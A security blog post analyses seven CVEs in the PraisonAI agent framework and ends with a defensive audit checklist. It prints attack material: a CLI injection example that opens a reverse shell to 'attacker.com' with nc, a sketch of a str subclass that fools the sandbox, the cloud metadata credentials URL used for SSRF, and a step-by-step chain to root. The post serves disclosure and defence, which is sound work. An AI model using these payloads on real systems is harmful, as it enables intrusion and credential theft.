7 CVEs in 48 Hours: How PraisonAI Got Completely Owned — And What Every Agent Framework Should Learn

PraisonAI is a popular multi-agent Python framework supporting 100+ LLMs. On April 3, 2026, seven CVEs dropped simultaneously. Together they enable complete system compromise from zero authentication to arbitrary code execution.

I spent the day analyzing each vulnerability. Here is what I found, why it matters, and the patterns every agent framework developer should audit for immediately.

The Sandbox Bypass (CVE-2026-34938, CVSS 10.0)

This is the most technically interesting attack I have seen this year.

PraisonAI's execute_code() function runs a sandbox with three protection layers. The innermost wrapper, _safe_getattr, calls startswith() on incoming arguments to check for dangerous imports like os, subprocess, and sys.

The attack: create a Python class that inherits from str and overrides startswith(). During the validation phase, the malicious class returns True ("yes, this is a safe import"). During execution, it returns False — revealing the real, dangerous import.

Three layers of protection defeated by a single abuse of Python's dynamic dispatch.

# Simplified version of the attack pattern
class EvilStr(str):
    def startswith(self, prefix, *args):
        # Return True during validation, False during execution
        if self._in_validation_context:
            return True
        return False

The lesson: if your sandbox validates types but not behaviors, it is bypassable. String-based validation is especially dangerous in languages with rich object models like Python.

The Inverted Auth (CVE-2026-34953, CVSS 9.1)

This one should terrify every framework developer.

OAuthManager.validate_token() returns True when a token is not found in the internal store. The store is empty by default.

Result: every single token passes validation. Any string in the Authorization: Bearer header grants full access to all MCP tools and agent capabilities.

The lesson: authentication logic must return True on match, not True on miss. This is a one-character bug (not in the wrong place) with CVSS 9.1 impact.

The Exposed Gateway (CVE-2026-34952, CVSS 9.1)

Two endpoints have zero authentication:

• /info — returns the complete agent topology: names, capabilities, connections
• /ws (WebSocket) — allows sending messages directly to any agent

An attacker can enumerate all agents via GET /info, then send commands via WebSocket. No credentials needed.

The SQL Injection (CVE-2026-34934, CVSS 9.8)

get_all_user_threads() builds SQL with f-strings:

# This is the pattern — never do this
query = f"SELECT * FROM threads WHERE user_id = {user_id}"

The injection happens in two steps: plant the payload via update_thread(), then trigger it when the system loads the thread list. Classic stored injection.

The CLI Injection (CVE-2026-34935, CVSS 9.8)

The --mcp CLI argument passes directly to shlex.split() then anyio.open_process(). No validation, no whitelist, no sanitization at any level.

# An attacker controlling the --mcp argument can do:
--mcp "node ; nc attacker.com 4444 -e /bin/sh"

The Subprocess Escape (CVE-2026-34955, CVSS 8.8)

SubprocessSandbox uses subprocess.run(shell=True) with a blocklist of dangerous executables. The blocklist blocks python, node, ruby — but not sh or bash.

sh -c arbitrary_command  # Not blocked
bash -c arbitrary_command  # Not blocked

The SSRF (CVE-2026-34954, CVSS 8.6)

FileTools.download_file() validates the destination path but not the URL parameter. It passes directly to httpx.stream(follow_redirects=True). Cloud metadata endpoints are reachable:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

The Chain

All seven CVEs are independently exploitable. But chained together, the damage is exponential:

1. GET /info → enumerate agents (no auth)
2. WebSocket /ws → send commands to agents (no auth)
3. Bearer anything → OAuthManager says yes (inverted logic)
4. Agent executes → str subclass bypasses sandbox → RCE
5. Or: SQL injection dumps the database
6. Or: SSRF steals cloud credentials
7. Or: CLI injection opens a reverse shell

An attacker goes from zero access to root in under a minute.

What Every Agent Framework Should Audit Right Now

PraisonAI is not a bad framework. It grew fast and the security layer did not keep up. This will happen to more frameworks. Here is the checklist:

1. Does your sandbox validate types or behaviors? If a subclass can override validation methods, your sandbox is tissue paper.
2. Does your auth return True on match or on miss? Inverted logic is a one-character bug with catastrophic impact.
3. Are all endpoints authenticated? WebSocket and info endpoints are often forgotten.
4. Do you use f-strings in SQL? Use parameterized queries. Always.
5. Do you pass CLI args directly to subprocess? Validate against a regex whitelist.
6. Does your blocklist cover sh and bash? Incomplete blocklists are worse than no blocklist — they create false confidence.
7. Do you validate URLs before HTTP requests? Especially with follow_redirects=True.

Tools That Catch This

I build two open-source tools for exactly these patterns:

• agent-probe — behavioral testing that catches runtime vulnerabilities like sandbox bypasses and injection chains (24 probes across 8 categories)
• clawhub-bridge — static scanning that catches patterns like credential theft, supply chain attacks, and capability inference (145 patterns across 42 categories)

The PraisonAI CVEs show exactly why you need both: static analysis catches the f-string SQL and the missing auth. Runtime probing catches the sandbox bypass and the inverted validation logic.

---

All CVEs have been patched in PraisonAI versions 1.5.90 through 4.5.97. Update immediately if you are running an affected version.

Sources: OffSeq Threat Radar, TheHackerWire, Vulnerability-Lookup